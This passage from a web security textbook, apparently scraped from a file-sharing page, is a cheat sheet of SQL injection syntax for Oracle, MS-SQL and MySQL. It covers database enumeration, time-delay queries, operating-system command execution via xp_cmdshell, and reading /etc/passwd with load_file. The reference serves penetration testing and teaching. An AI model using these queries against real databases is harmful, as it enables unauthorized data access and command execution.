The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws

SQL Syntax

Requirement:

ASCII

and 

SUBSTRING

Oracle:

ASCII(‘A’)

is equal to 

65

SUBSTR(‘ABCDE’,2,3)

is equal to 

BCD

MS-SQL:

ASCII(‘A’)

is equal to 

65

SUBSTRING(‘ABCDE’,2,3)

is equal to 

BCD

MySQL:

ASCII(‘A’)

is equal to 

65

SUBSTRING(‘ABCDE’,2,3)

is equal to 

BCD

Requirement:

Retrieve current database user

Oracle:

Select Sys.login_user from dual

SELECT user FROM dual

SYS_CONTEXT(‘USERENV’,’SESSION_USER’)

MS-SQL:

select user

select suser_sname()

MySQL:

SELECT user()

Requirement:

Cause a time delay

Oracle:

Utl_Http.request(‘http://madeupserver.com’)

MS-SQL:

waitfor delay ‘0:0:10’

exec master..xp_cmdshell ‘ping localhost’

MySQL:

benchmark(50000,sha1(‘test’))

Requirement:

Retrieve database version string

Oracle:

select banner from v$version

MS-SQL:

select @@version

MySQL:

select @@version

Requirement:

Retrieve current database

Oracle:

SYS_CONTEXT(‘USERENV’,’DB_NAME’)

MS-SQL:

select db_name()

The server name can be retrieved using: 

select @@servername

MySQL:

Select database()

290

Chapter 9 

■

Injecting Code

70779c09.qxd:WileyRed  9/14/07  3:13 PM  Page 290

Requirement:

Retrieve current user’s privilege

Oracle:

select * from session_privs

MS-SQL:

select grantee, table_name, privilege_type

from INFORMATION_SCHEMA.TABLE_PRIVILEGES

MySQL:

SHOW GRANTS FOR CURRENT_USER()

Requirement:

Show user objects

Oracle:

Select object_name, object_type from

user_objects

MS-SQL:

SELECT * FROM sysobjects

MySQL:

(There is no database metadata in MySQL.)

Requirement:

Show user tables

Oracle:

Select object_name, object_type from

user_objects WHERE object_type=’TABLE’

Or to show all tables to which the user has access:

SELECT table_name FROM all_tables

MS-SQL:

SELECT * FROM sysobjects WHERE xtype=’U’

MySQL:

(There is no database metadata in MySQL.)

Requirement:

Show column names for table foo

Oracle:

Select column_name, Name from user_tab_columns

where table_name = ‘FOO’

Use the

ALL_tab_columns

table if the target data is not

owned by the current application user.

MS-SQL:

SELECT syscolumns.* FROM syscolumns JOIN

sysobjects ON syscolumns.id=sysobjects.id

WHERE sysobjects.name=’FOO’

MySQL:

show columns from foo

Requirement:

Interact with the operating system (simplest ways)

Oracle:

See The Oracle Hacker’s Handbook, by David Litchfield

MS-SQL:

exec xp_cmshell ‘dir c:\‘

MySQL:

select load_file(‘/etc/passwd’)

Download 5,76 Mb.

Do'stlaringiz bilan baham: